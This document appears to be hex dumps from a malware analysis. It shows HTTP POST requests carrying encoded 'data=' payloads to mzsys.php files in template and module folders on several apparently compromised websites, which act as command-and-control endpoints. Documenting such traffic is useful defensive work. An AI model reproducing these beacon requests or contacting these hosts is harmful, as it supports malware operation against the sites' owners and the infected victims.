0x00000240 (00576)   31433733 44373842 45423537 35343245   1C73D78BEB57542E
0x00000250 (00592)   46413035 34323534 37423432 31463435   FA0542547B421F45
0x00000260 (00608)   42443439 38463532 33353936 35393743   BD498F523596597C
0x00000270 (00624)   38354536 35424543 45334432 43433644   85E65BECE3D2CC6D
0x00000280 (00640)   39384332 31454542 35464634 35394135   98C21EEB5FF459A5
0x00000290 (00656)   44383443 34334334 42444331 45373044   D84C43C4BDC1E70D
0x000002a0 (00672)   41424544 37464641 39414545 38443841   ABED7FFA9AEE8D8A
0x000002b0 (00688)   37464144 30323836 41323442 38304338   7FAD0286A24B80C8
0x000002c0 (00704)   38344338 42443031 44303146 36373538   84C8BD01D01F6758
0x000002d0 (00720)   39453331 41453546 30384643 42333646   9E31AE5F08FCB36F
0x000002e0 (00736)   33304435 41343837 33383032 30333532   30D5A48738020352
0x000002f0 (00752)   42303943 31313337 37353239 43383744   B09C11377529C87D
0x00000300 (00768)   38314330 34463533 39343645 38463938   81C04F53946E8F98
0x00000310 (00784)   41314131 32323946 34363045 41363632   A1A1229F460EA662
0x00000320 (00800)   36313744 39433633 32364341 34343434   617D9C6326CA4444
0x00000330 (00816)   35453432 42394536 37393443 38464341   5E42B9E6794C8FCA
0x00000340 (00832)   36413145 39333446 33393545 39434337   6A1E934F395E9CC7
0x00000350 (00848)   37354130 37354446 37393832 32324136   75A075DF798222A6
0x00000360 (00864)   44393945 38454134 46304430 35394341   D99E8EA4F0D059CA
0x00000370 (00880)   41394632 37334434 37393435 44334532   A9F273D47945D3E2
0x00000380 (00896)   30323444 43333544 31304533 39384331   024DC35D10E398C1
0x00000390 (00912)   37443746 39434243 31353237 31384342   7D7F9CBC152718CB
0x000003a0 (00928)   42303734 34313246 37303843 41454638   B074412F708CAEF8
0x000003b0 (00944)   32314530 41353436 46304542 44304542   21E0A546F0EBD0EB
0x000003c0 (00960)   442db2                                D-.

0x00000000 (00000)   504f5354 202f746d 702f6d7a 7379732e   POST /tmp/mzsys.
0x00000010 (00016)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a20732c 202c202c 202c202c   cept: s, , , , ,
0x00000030 (00048)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000060 (00096)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000070 (00112)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000080 (00128)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x00000090 (00144)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000a0 (00160)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000b0 (00176)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000c0 (00192)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000d0 (00208)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000e0 (00224)   0a486f73 743a2063 686f6e62 75726963   .Host: chonburic
0x000000f0 (00240)   6f6f702e 6e65740d 0a436f6e 74656e74   oop.net..Content
0x00000100 (00256)   2d4c656e 6774683a 20363435 0d0a4361   -Length: 645..Ca
0x00000110 (00272)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000120 (00288)   63616368 650d0a0d 0a646174 613d3043   cache....data=0C

0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   736a5f69 63656e74 65722f68 746d6c2f   sj_icenter/html/
0x00000020 (00032)   6d6f645f 6b325f63 6f6e7465 6e742f44   mod_k2_content/D
0x00000030 (00048)   65666175 6c742f6d 7a737973 2e706870   efault/mzsys.php
0x00000040 (00064)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000050 (00080)   743a2073 2c202c20 2c202c20 2c202c20   t: s, , , , , , 
0x00000060 (00096)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000070 (00112)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000080 (00128)   2c200d0a 436f6e74 656e742d 54797065   , ..Content-Type
0x00000090 (00144)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x000000a0 (00160)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x000000b0 (00176)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x000000c0 (00192)   204d6f7a 696c6c61 2f352e30 20285769    Mozilla/5.0 (Wi
0x000000d0 (00208)   6e646f77 73204e54 20362e33 3b20574f   ndows NT 6.3; WO
0x000000e0 (00224)   5736343b 20547269 64656e74 2f372e30   W64; Trident/7.0
0x000000f0 (00240)   3b20546f 7563683b 2072763a 31312e30   ; Touch; rv:11.0
0x00000100 (00256)   29206c69 6b652047 65636b6f 0d0a486f   ) like Gecko..Ho
0x00000110 (00272)   73743a20 70617373 6c696674 2e636f6d   st: passlift.com
0x00000120 (00288)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000130 (00304)   3a203634 350d0a43 61636865 2d436f6e   : 645..Cache-Con
0x00000140 (00320)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000150 (00336)   0d0a6461 74613d30 43333130 36464137   ..data=0C3106FA7

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f7370 65656475 702f6d7a 7379732e   d_speedup/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a20732c 202c202c 202c202c   cept: s, , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000070 (00112)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000080 (00128)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000090 (00144)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000b0 (00176)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000c0 (00192)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000d0 (00208)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000e0 (00224)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000f0 (00240)   0a486f73 743a2061 6374696f 6e706f75   .Host: actionpou
0x00000100 (00256)   72697372 61656c2e 636f6d0d 0a436f6e   risrael.com..Con
0x00000110 (00272)   74656e74 2d4c656e 6774683a 20363435   tent-Length: 645
0x00000120 (00288)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000130 (00304)   206e6f2d 63616368 650d0a0d 0a646174    no-cache....dat
0x00000140 (00320)   613d3043 33313036 46413733 32363230   a=0C3106FA732620


Strings